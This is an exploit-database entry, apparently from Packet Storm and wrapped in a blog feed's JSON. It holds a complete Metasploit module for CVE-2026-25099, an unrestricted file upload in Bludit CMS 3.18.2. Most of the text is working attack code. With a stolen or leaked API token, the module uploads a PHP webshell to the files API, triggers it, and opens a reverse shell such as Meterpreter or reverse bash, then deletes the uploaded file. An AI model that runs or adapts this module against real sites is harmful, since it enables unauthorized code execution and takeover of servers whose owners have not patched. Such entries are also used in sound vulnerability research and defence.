{“lastseen”:”2026-04-21T16:43:54″,”description”:”This Metasploit module targets a vulnerability in Bludit CMS version 3.18.2 targeting the API file upload mechanism which allows authenticated users with a valid API token to upload arbitrary files without proper validation. This can result in a shell…”,”published”:”2026-04-21T00:00:00″,”modified”:”2026-04-21T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Bludit CMS 3.18.2 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:219380″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25099″],”sourceData”:”==================================================================================================================================\\n | # Title : Bludit CMS 3.18.2 Unrestricted File Upload Leading to Remote Code Execution |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/bludit\/bludit\/archive\/refs\/tags\/3.18.2.zip |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit module targets a vulnerability in Bludit CMS (API file upload mechanism) that allows authenticated users with a valid API token to upload arbitrary files without proper validation.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::CmdStager\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Bludit CMS API Unrestricted File Upload to RCE’,\\n ‘Description’ =\\u003e %q{\\n Bludit CMS API plugin allows an authenticated user with a valid API token\\n to upload files of any type and extension via POST \/api\/files\/\\u003cpage-key\\u003e.\\n \\n The uploadFile() function performs no file extension or content validation,\\n allowing upload of PHP webshells that execute as www-data.\\n \\n The API token is generated when the API plugin is activated and is visible\\n to users with admin panel access. Tokens may also be exposed through\\n misconfiguration, log files, or other application vulnerabilities.\\n \\n This module exploits the unrestricted file upload to upload a PHP payload\\n and execute arbitrary commands on the target system.\\n \\n Tested on Bludit 3.18.2 on Ubuntu 24.04 LTS \/ Apache 2.4 \/ PHP 8.3.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-25099’],\\n [‘URL’, ‘https:\/\/github.com\/bludit\/bludit’],\\n [‘URL’, ‘https:\/\/yh.do’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘php’, ‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_PHP, ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP In-Memory’,\\n {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Type’ =\\u003e :php_memory,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’\\n }\\n }\\n ],\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n }\\n }\\n ],\\n [\\n ‘Linux Dropper’,\\n {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘Type’ =\\u003e :linux_dropper,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2026-03-28’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path for Bludit installation’, ‘\/’]),\\n OptString.new(‘API_TOKEN’, [true, ‘Bludit API authentication token’, ”]),\\n OptString.new(‘PAGE_KEY’, [false, ‘Specific page key to use (if not provided, will auto-discover)’, ”]),\\n OptInt.new(‘SHELL_TIMEOUT’, [true, ‘Timeout for shell commands in seconds’, 10])\\n ])\\n \\n register_advanced_options([\\n OptString.new(‘SHELL_FILENAME’, [false, ‘Custom webshell filename (random if not set)’, ”]),\\n OptBool.new(‘CLEANUP’, [true, ‘Delete uploaded shell after session’, true])\\n ])\\n end\\n \\n def setup\\n @base_uri = normalize_uri(target_uri.to_s)\\n @api_token = datastore[‘API_TOKEN’]\\n @page_key = datastore[‘PAGE_KEY’]\\n @shell_filename = datastore[‘SHELL_FILENAME’] || \\”#{Rex::Text.rand_text_alpha_lower(8)}.php\\”\\n @shell_url = nil\\n @uploaded = false\\n end\\n \\n def check\\n print_status(\\”Checking Bludit CMS version and API accessibility…\\”)\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_uri, ‘api’, ‘pages’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘token’ =\\u003e @api_token }\\n })\\n \\n return Exploit::CheckCode::Unknown(‘No response from target’) unless res\\n \\n if res.code == 200\\n begin\\n json = JSON.parse(res.body)\\n \\n if json[‘status’] == ‘0’ \\u0026\\u0026 json[‘data’].is_a?(Array)\\n print_good(\\”API token appears valid\\”)\\n \\n res_version = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_uri, ‘bl-kernel’, ‘version.php’),\\n ‘method’ =\\u003e ‘GET’\\n })\\n \\n if res_version \\u0026\\u0026 res_version.code == 200\\n if res_version.body =~ \/BLUDIT_VERSION[\\”‘]\\\\s*,\\\\s*[‘\\”]([^’\\”]+)[‘\\”]\/\\n version = Regexp.last_match(1)\\n \\n print_status(\\”Detected Bludit version: #{version}\\”)\\n \\n if Rex::Version.new(version) \\u003c Rex::Version.new(‘3.18.4’)\\n print_good(\\”Version #{version} appears vulnerable (fixed in 3.18.4)\\”)\\n return Exploit::CheckCode::Appears\\n else\\n print_warning(\\”Version #{version} may be patched\\”)\\n return Exploit::CheckCode::Detected\\n end\\n end\\n end\\n \\n return Exploit::CheckCode::Vulnerable(‘API accessible, likely vulnerable’)\\n else\\n return Exploit::CheckCode::Safe(‘API token invalid or no access’)\\n end\\n \\n rescue JSON::ParserError\\n return Exploit::CheckCode::Unknown(‘Invalid JSON response’)\\n end\\n elsif [401, 403].include?(res.code)\\n return Exploit::CheckCode::Safe(‘Unauthorized API token’)\\n else\\n return Exploit::CheckCode::Safe(\\”HTTP #{res.code}\\”)\\n end\\n end\\n \\n def get_page_key\\n unless @page_key.to_s.empty?\\n print_status(\\”Using provided page key: #{@page_key}\\”)\\n return @page_key\\n end\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_uri, ‘api’, ‘pages’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘token’ =\\u003e @api_token }\\n })\\n \\n unless res \\u0026\\u0026 res.code == 200\\n fail_with(Failure::UnexpectedReply, \\”Failed to retrieve pages\\”)\\n end\\n \\n json = JSON.parse(res.body) rescue nil\\n \\n if json \\u0026\\u0026 json[‘status’] == ‘0’ \\u0026\\u0026 json[‘data’].is_a?(Array) \\u0026\\u0026 !json[‘data’].empty?\\n page_key = json[‘data’][0][‘key’]\\n print_good(\\”Found page key: #{page_key}\\”)\\n return page_key\\n end\\n \\n fail_with(Failure::NotFound, ‘No valid page key found’)\\n end\\n \\n def upload_payload(payload_content, payload_filename)\\n print_status(\\”Uploading payload: #{payload_filename}\\”)\\n \\n fail_with(Failure::BadConfig, ‘Page key missing’) unless @page_key\\n \\n data = Rex::MIME::Message.new\\n data.add_part(@api_token, nil, nil, ‘form-data; name=\\”token\\”‘)\\n data.add_part(payload_content, ‘application\/x-php’, nil,\\n \\”form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”#{payload_filename}\\\\\\”\\”)\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_uri, ‘api’, ‘files’, @page_key),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘data’ =\\u003e data.to_s\\n })\\n \\n fail_with(Failure::Unreachable, ‘No response’) unless res\\n \\n if res.code == 200\\n json = JSON.parse(res.body) rescue {}\\n \\n if json[‘status’] == ‘0’ || res.body.include?(‘success’)\\n shell_url = normalize_uri(@base_uri, ‘bl-content’, ‘uploads’, ‘pages’, @page_key, payload_filename)\\n print_good(\\”Uploaded: #{shell_url}\\”)\\n return shell_url\\n end\\n \\n fail_with(Failure::UnexpectedReply, ‘Upload failed’)\\n end\\n \\n fail_with(Failure::UnexpectedReply, \\”HTTP #{res.code}\\”)\\n end\\n \\n def execute_command_php(shell_url, cmd)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e shell_url,\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘cmd’ =\\u003e cmd },\\n ‘timeout’ =\\u003e datastore[‘SHELL_TIMEOUT’]\\n })\\n \\n return unless res \\u0026\\u0026 res.code == 200\\n \\n res.body.to_s\\n end\\n \\n def execute_command(cmd, opts = {})\\n return unless @shell_url\\n \\n command = cmd.is_a?(Array) ? cmd.join(‘ ‘) : cmd\\n print_status(\\”Executing: #{command}\\”)\\n \\n output = execute_command_php(@shell_url, command)\\n \\n print_status(\\”Output:\\\\n#{output}\\”) if output\\n end\\n \\n def exploit\\n print_status(\\”Bludit RCE Exploit\\”)\\n \\n @page_key = get_page_key\\n \\n @payload_name = @shell_filename\\n webshell = \\”\\u003c?php #{payload.encoded} ?\\u003e\\”\\n @shell_url = upload_payload(webshell, @payload_name)\\n @uploaded = true\\n \\n register_file_for_cleanup(\\”bl-content\/uploads\/pages\/#{@page_key}\/#{@payload_name}\\”)\\n \\n send_request_cgi({ ‘uri’ =\\u003e @shell_url, ‘method’ =\\u003e ‘GET’ })\\n \\n handler\\n end\\n \\n def on_new_session(session)\\n super\\n \\n return unless datastore[‘CLEANUP’] \\u0026\\u0026 @uploaded \\u0026\\u0026 @shell_url \\u0026\\u0026 @payload_name\\n \\n begin\\n upload_path = \\”bl-content\/uploads\/pages\/#{@page_key}\/#{@payload_name}\\”\\n \\n if session.type == ‘meterpreter’\\n session.fs.file.rm(upload_path)\\n elsif session.type == ‘shell’\\n session.shell_write(\\”rm -f #{upload_path}\\\\n\\”)\\n end\\n rescue\\n print_warning(\\”Manual cleanup required\\”)\\n end\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219380″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219380\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-21T16:43:54″,”description”:”This Metasploit module targets a vulnerability in Bludit CMS version 3.18.2 targeting the API file upload mechanism which allows authenticated users with a valid API…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-48291","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n